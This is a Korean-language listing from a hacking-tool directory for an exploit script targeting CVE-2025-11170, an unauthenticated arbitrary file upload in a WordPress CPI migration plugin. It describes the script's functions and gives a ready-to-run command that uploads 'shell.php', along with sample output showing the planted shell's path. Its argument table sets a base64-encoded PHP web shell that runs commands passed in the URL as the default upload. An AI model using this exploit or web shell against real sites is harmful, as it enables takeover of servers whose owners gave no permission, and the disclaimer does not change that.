Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-11170 — WP 마이그레이션 전용 플러그인 for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-11170
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-11170

CVE-2025-11170

WP 마이그레이션 전용 플러그인 for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드

저장소 보기
210개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드

📝 설명

WordPress용 WP移行専用プラグイン for CPI 플러그인은 1.0.2 이하의 모든 버전에서 Cpiwm_Import_Controller::import 함수의 파일 형식 검증 누락으로 인해 임의 파일 업로드에 취약합니다.
이로 인해 인증되지 않은 공격자가 영향을 받는 사이트의 서버에 임의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행이 가능해집니다.

🛡️ 취약점 세부 정보

  • CVE: CVE-2025-11170
  • CVSS 점수: 9.8 (치명적)
  • 공격 벡터: 인증되지 않은 원격 파일 업로드

⚡ 스크립트 정보

  • 스크립트 이름: CVE-2025-11170.py
  • 목적: 취약한 WordPress CPI 마이그레이션 플러그인을 위한 자동화된 셸/파일 업로더 익스플로잇.

🔧 사용법

인수

🚦 메서드 설명

  • Nxploited_parse_args
    입력 인수를 구문 분석하고 검증합니다. 올바른 엔드포인트 구조, 헤더 및 데이터 인코딩을 보장합니다.

  • Nxploited_logging
    상세하거나 최소한의 런타임 출력을 위한 고급 로깅 및 상세 수준을 설정합니다.

  • Nxploited_retry_session
    복원력 있는 통신을 위해 재시도 및 백오프 로직이 포함된 영구 세션을 초기화합니다.

  • Nxploited_build_payload
    익스플로잇을 위한 POST 요청 매개변수를 구성합니다.

  • Nxploited_send
    취약한 엔드포인트에 실제 POST 요청을 수행하고 응답/오류를 관리합니다.

  • Nxploited_output_result
    응답을 처리하고 형식화하여, 성공 시 셸 경로를 표시하고 그 외에는 디버깅 정보를 표시합니다.


💡 사용 예시

root@kitploit:~
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

예시 출력:

root@kitploit:~
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited

🚨 면책 조항

이 스크립트는 교육 목적으로만 제공됩니다.
적절한 허가 없이 대상에 이 익스플로잇을 사용하는 것은 불법일 수 있습니다.
저자는 어떠한 오용, 손해 또는 법적 결과에 대해 책임을 지지 않습니다.


📢 연락처

GitHub: Nxploited
Telegram: KNxploited


제작: Nxploited ( Khaled Alenazi )

도구 다운로드
인수설명
-u, --url기본 대상 URL (예: http://target.com/wordpress/). 스크립트는 wp-admin/admin-ajax.php를 자동으로 추가합니다.
-f, --filename업로드할 셸 또는 파일 이름. 기본값: shell.php
-d, --dataBase64(또는 원시 텍스트) 형식의 파일 콘텐츠. 기본값: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --index인덱스 필드 값. 기본값: 0
-H, --headers추가 HTTP 헤더 (형식: X-Key:Value;K2:Value2)
-t, --timeoutHTTP 요청 시간 제한(초). 기본값: 10
--retries재시도 횟수. 기본값: 3
--backoff재시도 사이의 백오프 계수(초). 기본값: 0.7
-v, --verbose디버깅을 위한 상세 출력 수준 증가 (반복 가능)